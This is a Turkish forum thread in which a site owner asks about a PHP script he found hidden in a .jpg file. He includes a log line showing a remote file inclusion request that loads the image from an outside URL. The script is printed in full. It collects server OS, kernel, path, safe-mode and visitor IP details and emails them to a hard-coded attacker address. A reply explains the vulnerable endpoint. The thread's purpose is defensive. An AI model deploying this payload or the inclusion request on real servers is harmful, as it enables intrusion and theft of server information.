Bu kodlar ne işe yarar?

<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "B"."a"."M"."b"."Y"."<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 $safemode = true;
 $hsafemode = "4ON14";
}
else {$safemode = false; $hsafemode = "9OFF14";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$os = "[3SAFEMODE: ".$hsafemode."14] [3Kernel:15 ".$xos."14]";
echo "<center><A class=ria href=\"http://".$os."\">";echo "B"."a"."M"."b"."Y</A></center><br>";
echo "<br>OSTYPE:$os<br>";
echo "<br>Pwd:$xpwd<br>";
$creator = "ibne@tor.com";
($safe_mode)?($safemode="ON"):($safemode="OFF");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; 
$name = php_uname();
$ip = getenv("REMOTE_ADDR");
$host = gethostbyaddr($_SERVER[REMOTE_ADDR]);
$subj = $_SERVER['HTTP_HOST']; 
$msg = "\nBASE: $base\nuname -a: $name\nIP: $ip\nHost: $host\n$pwds\n";
$from ="From: MODE_=".$safemode."<tool@".$_SERVER['HTTP_HOST'].">";
mail( $creator, $subj, $msg, $from);die("<center> ByroeNet </center>");
?>

Bu kodlar .jpg dosyasına gömülerek benim hostum sayesinde başka sitelere saldırıda bulunuluyormuş, bu nasıl bir saldırı metodudur öğreneyim istemiştim.Loglar şu şekilde;

217.xxx.x.x - - [08/Jan/2011:03:41:01 +0100] www.xxxxx.org 'GET /question/bad_link.php?theme_path=http://www.kruzhka.ru//logos/myid.jpg????????
HTTP/1.1' 302 5206

server hakkında olan bilgileri ibne@tor.com adresine gönderiyor.

Bu bir saldırı metodu mudur? Ayrıca karşı sisteme yada benim sistemime ne tür bir zarar verebilir?

"/question/bad_link.php?" dosyasında açıktan faydalanarak o siteye/server'a sızma ihtimali var saldırganın.

Sizin serverınızı ise bu scripti yüklemek için kullanmış, aracı oluyorsunuz bir nevi. O resmi nasıl upload ettiğine bulun, çünkü aynı risk sizin için de geçerli.

Engellemek için ne önerirsin?